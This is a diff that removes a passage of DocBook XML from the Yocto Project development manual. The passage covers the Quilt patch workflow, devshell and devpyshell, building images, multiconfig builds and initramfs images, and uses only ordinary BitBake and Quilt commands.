-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink>:
-                    The recipe name.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTENDPE'><filename>EXTENDPE</filename></ulink>:
-                    The epoch - (if
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PE'><filename>PE</filename></ulink>
-                    is not specified, which is usually the case for most
-                    recipes, then <filename>EXTENDPE</filename> is blank).
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>:
-                    The recipe version.
-                    </para></listitem>
-                <listitem><para>
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>:
-                    The recipe revision.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            As an example, assume a Source Directory top-level folder
-            named <filename>poky</filename>, a default Build Directory at
-            <filename>poky/build</filename>, and a
-            <filename>qemux86-poky-linux</filename> machine target
-            system.
-            Furthermore, suppose your recipe is named
-            <filename>foo_1.3.0.bb</filename>.
-            In this case, the work directory the build system uses to
-            build the package would be as follows:
-            <literallayout class='monospaced'>
-     poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0
-            </literallayout>
-        </para>
-    </section>
-
-    <section id="using-a-quilt-workflow">
-        <title>Using Quilt in Your Workflow</title>
-
-        <para>
-            <ulink url='http://savannah.nongnu.org/projects/quilt'>Quilt</ulink>
-            is a powerful tool that allows you to capture source code changes
-            without having a clean source tree.
-            This section outlines the typical workflow you can use to modify
-            source code, test changes, and then preserve the changes in the
-            form of a patch all using Quilt.
-            <note><title>Tip</title>
-                With regard to preserving changes to source files, if you
-                clean a recipe or have <filename>rm_work</filename> enabled,
-                the
-                <ulink url='&YOCTO_DOCS_SDK_URL;#using-devtool-in-your-sdk-workflow'><filename>devtool</filename> workflow</ulink>
-                as described in the Yocto Project Application Development
-                and the Extensible Software Development Kit (eSDK) manual
-                is a safer development flow than the flow that uses Quilt.
-            </note>
-        </para>
-
-        <para>
-            Follow these general steps:
-            <orderedlist>
-                <listitem><para>
-                    <emphasis>Find the Source Code:</emphasis>
-                    Temporary source code used by the OpenEmbedded build system
-                    is kept in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                    See the
-                    "<link linkend='finding-the-temporary-source-code'>Finding Temporary Source Code</link>"
-                    section to learn how to locate the directory that has the
-                    temporary source code for a particular package.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Change Your Working Directory:</emphasis>
-                    You need to be in the directory that has the temporary
-                    source code.
-                    That directory is defined by the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>
-                    variable.</para></listitem>
-                <listitem><para>
-                    <emphasis>Create a New Patch:</emphasis>
-                    Before modifying source code, you need to create a new
-                    patch.
-                    To create a new patch file, use
-                    <filename>quilt new</filename> as below:
-                    <literallayout class='monospaced'>
-     $ quilt new my_changes.patch
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Notify Quilt and Add Files:</emphasis>
-                    After creating the patch, you need to notify Quilt about
-                    the files you plan to edit.
-                    You notify Quilt by adding the files to the patch you
-                    just created:
-                    <literallayout class='monospaced'>
-     $ quilt add file1.c file2.c file3.c
-                    </literallayout>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Edit the Files:</emphasis>
-                    Make your changes in the source code to the files you added
-                    to the patch.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Test Your Changes:</emphasis>
-                    Once you have modified the source code, the easiest way to
-                    test your changes is by calling the
-                    <filename>do_compile</filename> task as shown in the
-                    following example:
-                    <literallayout class='monospaced'>
-     $ bitbake -c compile -f <replaceable>package</replaceable>
-                    </literallayout>
-                    The <filename>-f</filename> or <filename>--force</filename>
-                    option forces the specified task to execute.
-                    If you find problems with your code, you can just keep
-                    editing and re-testing iteratively until things work
-                    as expected.
-                    <note>
-                        All the modifications you make to the temporary
-                        source code disappear once you run the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-clean'><filename>do_clean</filename></ulink>
-                        or
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-cleanall'><filename>do_cleanall</filename></ulink>
-                        tasks using BitBake (i.e.
-                        <filename>bitbake -c clean <replaceable>package</replaceable></filename>
-                        and
-                        <filename>bitbake -c cleanall <replaceable>package</replaceable></filename>).
-                        Modifications will also disappear if you use the
-                        <filename>rm_work</filename> feature as described
-                        in the
-                        "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-saving-memory-during-a-build'>Conserving Disk Space During Builds</ulink>"
-                        section.
-                    </note>
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Generate the Patch:</emphasis>
-                    Once your changes work as expected, you need to use Quilt
-                    to generate the final patch that contains all your
-                    modifications.
-                    <literallayout class='monospaced'>
-     $ quilt refresh
-                    </literallayout>
-                    At this point, the <filename>my_changes.patch</filename>
-                    file has all your edits made to the
-                    <filename>file1.c</filename>, <filename>file2.c</filename>,
-                    and <filename>file3.c</filename> files.</para>
-
-                    <para>You can find the resulting patch file in the
-                    <filename>patches/</filename> subdirectory of the source
-                    (<filename>S</filename>) directory.
-                    </para></listitem>
-                <listitem><para>
-                    <emphasis>Copy the Patch File:</emphasis>
-                    For simplicity, copy the patch file into a directory
-                    named <filename>files</filename>, which you can create
-                    in the same directory that holds the recipe
-                    (<filename>.bb</filename>) file or the append
-                    (<filename>.bbappend</filename>) file.
-                    Placing the patch here guarantees that the OpenEmbedded
-                    build system will find the patch.
-                    Next, add the patch into the
-                    <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'>SRC_URI</ulink></filename>
-                    of the recipe.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     SRC_URI += "file://my_changes.patch"
-                    </literallayout>
-                    </para></listitem>
-            </orderedlist>
-        </para>
-    </section>
-
-    <section id="platdev-appdev-devshell">
-        <title>Using a Development Shell</title>
-
-        <para>
-            When debugging certain commands or even when just editing packages,
-            <filename>devshell</filename> can be a useful tool.
-            When you invoke <filename>devshell</filename>, all tasks up to and
-            including
-            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
-            are run for the specified target.
-            Then, a new terminal is opened and you are placed in
-            <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink><filename>}</filename>,
-            the source directory.
-            In the new terminal, all the OpenEmbedded build-related environment variables are
-            still defined so you can use commands such as <filename>configure</filename> and
-            <filename>make</filename>.
-            The commands execute just as if the OpenEmbedded build system were executing them.
-            Consequently, working this way can be helpful when debugging a build or preparing
-            software to be used with the OpenEmbedded build system.
-        </para>
-
-        <para>
-            Following is an example that uses <filename>devshell</filename> on a target named
-            <filename>matchbox-desktop</filename>:
-            <literallayout class='monospaced'>
-     $ bitbake matchbox-desktop -c devshell
-            </literallayout>
-        </para>
-
-        <para>
-            This command spawns a terminal with a shell prompt within the OpenEmbedded build environment.
-            The <ulink url='&YOCTO_DOCS_REF_URL;#var-OE_TERMINAL'><filename>OE_TERMINAL</filename></ulink>
-            variable controls what type of shell is opened.
-        </para>
-
-        <para>
-            For spawned terminals, the following occurs:
-            <itemizedlist>
-                <listitem><para>The <filename>PATH</filename> variable includes the
-                    cross-toolchain.</para></listitem>
-                <listitem><para>The <filename>pkgconfig</filename> variables find the correct
-                    <filename>.pc</filename> files.</para></listitem>
-                <listitem><para>The <filename>configure</filename> command finds the
-                    Yocto Project site files as well as any other necessary files.</para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            Within this environment, you can run configure or compile
-            commands as if they were being run by
-            the OpenEmbedded build system itself.
-            As noted earlier, the working directory also automatically changes to the
-            Source Directory (<ulink url='&YOCTO_DOCS_REF_URL;#var-S'><filename>S</filename></ulink>).
-        </para>
-
-        <para>
-            To manually run a specific task using <filename>devshell</filename>,
-            run the corresponding <filename>run.*</filename> script in
-            the
-            <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}/temp</filename>
-            directory (e.g.,
-            <filename>run.do_configure.</filename><replaceable>pid</replaceable>).
-            If a task's script does not exist, which would be the case if the task was
-            skipped by way of the sstate cache, you can create the task by first running
-            it outside of the <filename>devshell</filename>:
-            <literallayout class='monospaced'>
-     $ bitbake -c <replaceable>task</replaceable>
-            </literallayout>
-            <note><title>Notes</title>
-                <itemizedlist>
-                    <listitem><para>Execution of a task's <filename>run.*</filename>
-                        script and BitBake's execution of a task are identical.
-                        In other words, running the script re-runs the task
-                        just as it would be run using the
-                        <filename>bitbake -c</filename> command.
-                        </para></listitem>
-                    <listitem><para>Any <filename>run.*</filename> file that does not
-                        have a <filename>.pid</filename> extension is a
-                        symbolic link (symlink) to the most recent version of that
-                        file.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-        </para>
-
-        <para>
-            Remember, that the <filename>devshell</filename> is a mechanism that allows
-            you to get into the BitBake task execution environment.
-            And as such, all commands must be called just as BitBake would call them.
-            That means you need to provide the appropriate options for
-            cross-compilation and so forth as applicable.
-        </para>
-
-        <para>
-            When you are finished using <filename>devshell</filename>, exit the shell
-            or close the terminal window.
-        </para>
-
-        <note><title>Notes</title>
-            <itemizedlist>
-                <listitem><para>
-                    It is worth remembering that when using <filename>devshell</filename>
-                    you need to use the full compiler name such as <filename>arm-poky-linux-gnueabi-gcc</filename>
-                    instead of just using <filename>gcc</filename>.
-                    The same applies to other applications such as <filename>binutils</filename>,
-                    <filename>libtool</filename> and so forth.
-                    BitBake sets up environment variables such as <filename>CC</filename>
-                    to assist applications, such as <filename>make</filename> to find the correct tools.
-                    </para></listitem>
-                <listitem><para>
-                    It is also worth noting that <filename>devshell</filename> still works over
-                    X11 forwarding and similar situations.
-                    </para></listitem>
-            </itemizedlist>
-        </note>
-    </section>
-
-    <section id="platdev-appdev-devpyshell">
-        <title>Using a Development Python Shell</title>
-
-        <para>
-            Similar to working within a development shell as described in
-            the previous section, you can also spawn and work within an
-            interactive Python development shell.
-            When debugging certain commands or even when just editing packages,
-            <filename>devpyshell</filename> can be a useful tool.
-            When you invoke <filename>devpyshell</filename>, all tasks up to and
-            including
-            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-patch'><filename>do_patch</filename></ulink>
-            are run for the specified target.
-            Then a new terminal is opened.
-            Additionally, key Python objects and code are available in the same
-            way they are to BitBake tasks, in particular, the data store 'd'.
-            So, commands such as the following are useful when exploring the data
-            store and running functions:
-            <literallayout class='monospaced'>
-     pydevshell> d.getVar("STAGING_DIR")
-     '/media/build1/poky/build/tmp/sysroots'
-     pydevshell> d.getVar("STAGING_DIR")
-     '${TMPDIR}/sysroots'
-     pydevshell> d.setVar("FOO", "bar")
-     pydevshell> d.getVar("FOO")
-     'bar'
-     pydevshell> d.delVar("FOO")
-     pydevshell> d.getVar("FOO")
-     pydevshell> bb.build.exec_func("do_unpack", d)
-     pydevshell>
-            </literallayout>
-            The commands execute just as if the OpenEmbedded build system were executing them.
-            Consequently, working this way can be helpful when debugging a build or preparing
-            software to be used with the OpenEmbedded build system.
-        </para>
-
-        <para>
-            Following is an example that uses <filename>devpyshell</filename> on a target named
-            <filename>matchbox-desktop</filename>:
-            <literallayout class='monospaced'>
-     $ bitbake matchbox-desktop -c devpyshell
-            </literallayout>
-        </para>
-
-        <para>
-            This command spawns a terminal and places you in an interactive
-            Python interpreter within the OpenEmbedded build environment.
-            The <ulink url='&YOCTO_DOCS_REF_URL;#var-OE_TERMINAL'><filename>OE_TERMINAL</filename></ulink>
-            variable controls what type of shell is opened.
-        </para>
-
-        <para>
-            When you are finished using <filename>devpyshell</filename>, you
-            can exit the shell either by using Ctrl+d or closing the terminal
-            window.
-        </para>
-    </section>
-
-    <section id='dev-building'>
-        <title>Building</title>
-
-        <para>
-            This section describes various build procedures.
-            For example, the steps needed for a simple build, a target that
-            uses multiple configurations, building an image for more than
-            one machine, and so forth.
-        </para>
-
-        <section id='dev-building-a-simple-image'>
-            <title>Building a Simple Image</title>
-
-            <para>
-                In the development environment, you need to build an image
-                whenever you change hardware support, add or change system
-                libraries, or add or change services that have dependencies.
-                Several methods exist that allow you to build an image within
-                the Yocto Project.
-                This section presents the basic steps you need to build a
-                simple image using BitBake from a build host running Linux.
-                <note><title>Notes</title>
-                    <itemizedlist>
-                        <listitem><para>
-                            For information on how to build an image using
-                            <ulink url='&YOCTO_DOCS_REF_URL;#toaster-term'>Toaster</ulink>,
-                            see the
-                            <ulink url='&YOCTO_DOCS_TOAST_URL;'>Toaster User Manual</ulink>.
-                            </para></listitem>
-                        <listitem><para>
-                            For information on how to use
-                            <filename>devtool</filename> to build images, see
-                            the
-                            "<ulink url='&YOCTO_DOCS_SDK_URL;#using-devtool-in-your-sdk-workflow'>Using <filename>devtool</filename> in Your SDK Workflow</ulink>"
-                            section in the Yocto Project Application
-                            Development and the Extensible Software Development
-                            Kit (eSDK) manual.
-                            </para></listitem>
-                        <listitem><para>
-                            For a quick example on how to build an image using
-                            the OpenEmbedded build system, see the
-                            <ulink url='&YOCTO_DOCS_BRIEF_URL;'>Yocto Project Quick Build</ulink>
-                            document.
-                            </para></listitem>
-                    </itemizedlist>
-                </note>
-            </para>
-
-            <para>
-                The build process creates an entire Linux distribution from
-                source and places it in your
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                under <filename>tmp/deploy/images</filename>.
-                For detailed information on the build process using BitBake,
-                see the
-                "<ulink url='&YOCTO_DOCS_OM_URL;#images-dev-environment'>Images</ulink>"
-                section in the Yocto Project Overview and Concepts Manual.
-            </para>
-
-            <para>
-                The following figure and list overviews the build process:
-                <imagedata fileref="figures/bitbake-build-flow.png" width="7in" depth="4in" align="center" scalefit="1" />
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Set up Your Host Development System to Support
-                        Development Using the Yocto Project</emphasis>:
-                        See the
-                        "<link linkend='dev-manual-start'>Setting Up to Use the Yocto Project</link>"
-                        section for options on how to get a build host ready to
-                        use the Yocto Project.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Initialize the Build Environment:</emphasis>
-                        Initialize the build environment by sourcing the build
-                        environment script (i.e.
-                        <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>):
-                        <literallayout class='monospaced'>
-     $ source &OE_INIT_FILE; [<replaceable>build_dir</replaceable>]
-                        </literallayout></para>
-
-                        <para>When you use the initialization script, the
-                        OpenEmbedded build system uses
-                        <filename>build</filename> as the default Build
-                        Directory in your current work directory.
-                        You can use a <replaceable>build_dir</replaceable>
-                        argument with the script to specify a different build
-                        directory.
-                        <note><title>Tip</title>
-                            A common practice is to use a different Build
-                            Directory for different targets.
-                            For example, <filename>~/build/x86</filename> for a
-                            <filename>qemux86</filename> target, and
-                            <filename>~/build/arm</filename> for a
-                            <filename>qemuarm</filename> target.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Make Sure Your <filename>local.conf</filename>
-                        File is Correct:</emphasis>
-                        Ensure the <filename>conf/local.conf</filename>
-                        configuration file, which is found in the Build
-                        Directory, is set up how you want it.
-                        This file defines many aspects of the build environment
-                        including the target machine architecture through the
-                        <filename><ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'>MACHINE</ulink></filename> variable,
-                        the packaging format used during the build
-                        (<ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>),
-                        and a centralized tarball download directory through the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink> variable.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Build the Image:</emphasis>
-                        Build the image using the <filename>bitbake</filename>
-                        command:
-                        <literallayout class='monospaced'>
-     $ bitbake <replaceable>target</replaceable>
-                        </literallayout>
-                        <note>
-                            For information on BitBake, see the
-                            <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
-                        </note>
-                        The <replaceable>target</replaceable> is the name of the
-                        recipe you want to build.
-                        Common targets are the images in
-                        <filename>meta/recipes-core/images</filename>,
-                        <filename>meta/recipes-sato/images</filename>, and so
-                        forth all found in the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-                        Or, the target can be the name of a recipe for a
-                        specific piece of software such as BusyBox.
-                        For more details about the images the OpenEmbedded build
-                        system supports, see the
-                        "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
-                        chapter in the Yocto Project Reference Manual.</para>
-
-                        <para>As an example, the following command builds the
-                        <filename>core-image-minimal</filename> image:
-                        <literallayout class='monospaced'>
-     $ bitbake core-image-minimal
-                        </literallayout>
-                        Once an image has been built, it often needs to be
-                        installed.
-                        The images and kernels built by the OpenEmbedded
-                        build system are placed in the Build Directory in
-                        <filename class="directory">tmp/deploy/images</filename>.
-                        For information on how to run pre-built images such as
-                        <filename>qemux86</filename> and <filename>qemuarm</filename>,
-                        see the
-                        <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-                        manual.
-                        For information about how to install these images,
-                        see the documentation for your particular board or
-                        machine.
-                        </para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-
-        <section id='dev-building-images-for-multiple-targets-using-multiple-configurations'>
-            <title>Building Images for Multiple Targets Using Multiple Configurations</title>
-
-            <para>
-                You can use a single <filename>bitbake</filename> command
-                to build multiple images or packages for different targets
-                where each image or package requires a different configuration
-                (multiple configuration builds).
-                The builds, in this scenario, are sometimes referred to as
-                "multiconfigs", and this section uses that term throughout.
-            </para>
-
-            <para>
-                This section describes how to set up for multiple
-                configuration builds and how to account for cross-build
-                dependencies between the multiconfigs.
-            </para>
-
-            <section id='dev-setting-up-and-running-a-multiple-configuration-build'>
-                <title>Setting Up and Running a Multiple Configuration Build</title>
-
-                <para>
-                    To accomplish a multiple configuration build, you must
-                    define each target's configuration separately using
-                    a parallel configuration file in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
-                    and you must follow a required file hierarchy.
-                    Additionally, you must enable the multiple configuration
-                    builds in your <filename>local.conf</filename> file.
-                </para>
-
-                <para>
-                    Follow these steps to set up and execute multiple
-                    configuration builds:
-                    <itemizedlist>
-                        <listitem><para>
-                            <emphasis>Create Separate Configuration Files</emphasis>:
-                            You need to create a single configuration file for
-                            each build target (each multiconfig).
-                            Minimally, each configuration file must define the
-                            machine and the temporary directory BitBake uses
-                            for the build.
-                            Suggested practice dictates that you do not
-                            overlap the temporary directories
-                            used during the builds.
-                            However, it is possible that you can share the
-                            temporary directory
-                            (<ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>).
-                            For example, consider a scenario with two
-                            different multiconfigs for the same
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>: "qemux86" built for
-                            two distributions such as "poky" and "poky-lsb".
-                            In this case, you might want to use the same
-                            <filename>TMPDIR</filename>.</para>
-
-                            <para>Here is an example showing the minimal
-                            statements needed in a configuration file for
-                            a "qemux86" target whose temporary build directory
-                            is <filename>tmpmultix86</filename>:
-                            <literallayout class='monospaced'>
-     MACHINE="qemux86"
-     TMPDIR="${TOPDIR}/tmpmultix86"
-                            </literallayout></para>
-
-                            <para>The location for these multiconfig
-                            configuration files is specific.
-                            They must reside in the current build directory in
-                            a sub-directory of <filename>conf</filename> named
-                            <filename>multiconfig</filename>.
-                            Following is an example that defines two
-                            configuration files for the "x86" and "arm"
-                            multiconfigs:
-                            <imagedata fileref="figures/multiconfig_files.png" align="center" width="4in" depth="3in" />
-                            </para>
-
-                            <para>The reason for this required file hierarchy
-                            is because the <filename>BBPATH</filename> variable
-                            is not constructed until the layers are parsed.
-                            Consequently, using the configuration file as a
-                            pre-configuration file is not possible unless it is
-                            located in the current working directory.
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Add the BitBake Multi-configuration Variable to the Local Configuration File</emphasis>:
-                            Use the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-BBMULTICONFIG'><filename>BBMULTICONFIG</filename></ulink>
-                            variable in your
-                            <filename>conf/local.conf</filename> configuration
-                            file to specify each multiconfig.
-                            Continuing with the example from the previous
-                            figure, the <filename>BBMULTICONFIG</filename>
-                            variable needs to enable two multiconfigs: "x86"
-                            and "arm" by specifying each configuration file:
-                            <literallayout class='monospaced'>
-     BBMULTICONFIG = "x86 arm"
-                            </literallayout>
-                            <note>
-                                A "default" configuration already exists by
-                                definition.
-                                This configuration is named: "" (i.e. empty
-                                string) and is defined by the variables coming
-                                from your <filename>local.conf</filename> file.
-                                Consequently, the previous example actually
-                                adds two additional configurations to your
-                                build: "arm" and "x86" along with "".
-                            </note>
-                            </para></listitem>
-                        <listitem><para>
-                            <emphasis>Launch BitBake</emphasis>:
-                            Use the following BitBake command form to launch the
-                            multiple configuration build:
-                            <literallayout class='monospaced'>
-     $ bitbake [mc:<replaceable>multiconfigname</replaceable>:]<replaceable>target</replaceable> [[[mc:<replaceable>multiconfigname</replaceable>:]<replaceable>target</replaceable>] ... ]
-                            </literallayout>
-                            For the example in this section, the following
-                            command applies:
-                            <literallayout class='monospaced'>
-     $ bitbake mc:x86:core-image-minimal mc:arm:core-image-sato mc::core-image-base
-                            </literallayout>
-                            The previous BitBake command builds a
-                            <filename>core-image-minimal</filename> image that
-                            is configured through the
-                            <filename>x86.conf</filename> configuration file,
-                            a <filename>core-image-sato</filename>
-                            image that is configured through the
-                            <filename>arm.conf</filename> configuration file
-                            and a <filename>core-image-base</filename> that is
-                            configured through your
-                            <filename>local.conf</filename> configuration file.
-                            </para></listitem>
-                    </itemizedlist>
-                    <note>
-                        Support for multiple configuration builds in the
-                        Yocto Project &DISTRO; (&DISTRO_NAME;) Release does
-                        not include Shared State (sstate) optimizations.
-                        Consequently, if a build uses the same object twice
-                        in, for example, two different
-                        <filename>TMPDIR</filename> directories, the build
-                        either loads from an existing sstate cache for that
-                        build at the start or builds the object fresh.
-                    </note>
-                </para>
-            </section>
-
-            <section id='dev-enabling-multiple-configuration-build-dependencies'>
-                <title>Enabling Multiple Configuration Build Dependencies</title>
-
-                <para>
-                    Sometimes dependencies can exist between targets
-                    (multiconfigs) in a multiple configuration build.
-                    For example, suppose that in order to build a
-                    <filename>core-image-sato</filename> image for an "x86"
-                    multiconfig, the root filesystem of an "arm"
-                    multiconfig must exist.
-                    This dependency is essentially that the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-image'><filename>do_image</filename></ulink>
-                    task in the <filename>core-image-sato</filename> recipe
-                    depends on the completion of the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-rootfs'><filename>do_rootfs</filename></ulink>
-                    task of the <filename>core-image-minimal</filename>
-                    recipe.
-                </para>
-
-                <para>
-                    To enable dependencies in a multiple configuration
-                    build, you must declare the dependencies in the recipe
-                    using the following statement form:
-                    <literallayout class='monospaced'>
-     <replaceable>task_or_package</replaceable>[mcdepends] = "mc:<replaceable>from_multiconfig</replaceable>:<replaceable>to_multiconfig</replaceable>:<replaceable>recipe_name</replaceable>:<replaceable>task_on_which_to_depend</replaceable>"
-                    </literallayout>
-                    To better show how to use this statement, consider the
-                    example scenario from the first paragraph of this section.
-                    The following statement needs to be added to the recipe
-                    that builds the <filename>core-image-sato</filename>
-                    image:
-                    <literallayout class='monospaced'>
-     do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_rootfs"
-                    </literallayout>
-                    In this example, the
-                    <replaceable>from_multiconfig</replaceable> is "x86".
-                    The <replaceable>to_multiconfig</replaceable> is "arm".
-                    The task on which the <filename>do_image</filename> task
-                    in the recipe depends is the <filename>do_rootfs</filename>
-                    task from the <filename>core-image-minimal</filename>
-                    recipe associated with the "arm" multiconfig.
-               </para>
-
-               <para>
-                   Once you set up this dependency, you can build the
-                   "x86" multiconfig using a BitBake command as follows:
-                   <literallayout class='monospaced'>
-     $ bitbake mc:x86:core-image-sato
-                   </literallayout>
-                   This command executes all the tasks needed to create
-                   the <filename>core-image-sato</filename> image for the
-                   "x86" multiconfig.
-                   Because of the dependency, BitBake also executes through
-                   the <filename>do_rootfs</filename> task for the "arm"
-                   multiconfig build.
-               </para>
-
-               <para>
-                   Having a recipe depend on the root filesystem of another
-                   build might not seem that useful.
-                   Consider this change to the statement in the
-                   <filename>core-image-sato</filename> recipe:
-                   <literallayout class='monospaced'>
-     do_image[mcdepends] = "mc:x86:arm:core-image-minimal:do_image"
-                   </literallayout>
-                   In this case, BitBake must create the
-                   <filename>core-image-minimal</filename> image for the
-                   "arm" build since the "x86" build depends on it.
-               </para>
-
-               <para>
-                   Because "x86" and "arm" are enabled for multiple
-                   configuration builds and have separate configuration
-                   files, BitBake places the artifacts for each build in the
-                   respective temporary build directories (i.e.
-                   <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>).
-               </para>
-            </section>
-        </section>
-
-        <section id='building-an-initramfs-image'>
-            <title>Building an Initial RAM Filesystem (initramfs) Image</title>
-
-            <para>
-                An initial RAM filesystem (initramfs) image provides a temporary
-                root filesystem used for early system initialization (e.g.
-                loading of modules needed to locate and mount the "real" root
-                filesystem).
-                <note>
-                    The initramfs image is the successor of initial RAM disk
-                    (initrd).
-                    It is a "copy in and out" (cpio) archive of the initial
-                    filesystem that gets loaded into memory during the Linux
-                    startup process.
-                    Because Linux uses the contents of the archive during
-                    initialization, the initramfs image needs to contain all of the
-                    device drivers and tools needed to mount the final root
-                    filesystem.
-                </note>
-            </para>
-
-            <para>
-                Follow these steps to create an initramfs image:
-                <orderedlist>
-                    <listitem><para>
-                        <emphasis>Create the initramfs Image Recipe:</emphasis>
-                        You can reference the
-                        <filename>core-image-minimal-initramfs.bb</filename>
-                        recipe found in the <filename>meta/recipes-core</filename>
-                        directory of the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                        as an example from which to work.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Decide if You Need to Bundle the initramfs Image
-                        Into the Kernel Image:</emphasis>
-                        If you want the initramfs image that is built to be
-                        bundled in with the kernel image, set the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-INITRAMFS_IMAGE_BUNDLE'><filename>INITRAMFS_IMAGE_BUNDLE</filename></ulink>
-                        variable to "1" in your <filename>local.conf</filename>
-                        configuration file and set the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-INITRAMFS_IMAGE'><filename>INITRAMFS_IMAGE</filename></ulink>
-                        variable in the recipe that builds the kernel image.
-                        <note><title>Tip</title>
-                            It is recommended that you do bundle the initramfs
-                            image with the kernel image to avoid circular
-                            dependencies between the kernel recipe and the
-                            initramfs recipe should the initramfs image
-                            include kernel modules.
-                        </note>
-                        Setting the <filename>INITRAMFS_IMAGE_BUNDLE</filename>
-                        flag causes the initramfs image to be unpacked
-                        into the <filename>${B}/usr/</filename> directory.
-                        The unpacked initramfs image is then passed to the kernel's
-                        <filename>Makefile</filename> using the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-CONFIG_INITRAMFS_SOURCE'><filename>CONFIG_INITRAMFS_SOURCE</filename></ulink>
-                        variable, allowing the initramfs image to be built into
-                        the kernel normally.
-                        <note>
-                            If you choose to not bundle the initramfs image with
-                            the kernel image, you are essentially using an
-                            <ulink url='https://en.wikipedia.org/wiki/Initrd'>Initial RAM Disk (initrd)</ulink>.
-                            Creating an initrd is handled primarily through the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-INITRD_IMAGE'><filename>INITRD_IMAGE</filename></ulink>,
-                            <filename>INITRD_LIVE</filename>, and
-                            <filename>INITRD_IMAGE_LIVE</filename> variables.
-                            For more information, see the
-                            <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/classes/image-live.bbclass'><filename>image-live.bbclass</filename></ulink>
-                            file.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Optionally Add Items to the initramfs Image
-                        Through the initramfs Image Recipe:</emphasis>
-                        If you add items to the initramfs image by way of its
-                        recipe, you should use
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_INSTALL'><filename>PACKAGE_INSTALL</filename></ulink>
-                        rather than
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></ulink>.
-                        <filename>PACKAGE_INSTALL</filename> gives more direct
-                        control of what is added to the image as compared to
-                        the defaults you might not necessarily want that are
-                        set by the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-image'><filename>image</filename></ulink>
-                        or
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-core-image'><filename>core-image</filename></ulink>
-                        classes.
-                        </para></listitem>
-                    <listitem><para>
-                        <emphasis>Build the Kernel Image and the initramfs
-                        Image:</emphasis>
-                        Build your kernel image using BitBake.
-                        Because the initramfs image recipe is a dependency of the
-                        kernel image, the initramfs image is built as well and
-                        bundled with the kernel image if you used the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-INITRAMFS_IMAGE_BUNDLE'><filename>INITRAMFS_IMAGE_BUNDLE</filename></ulink>
-                        variable described earlier.
-                        </para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-
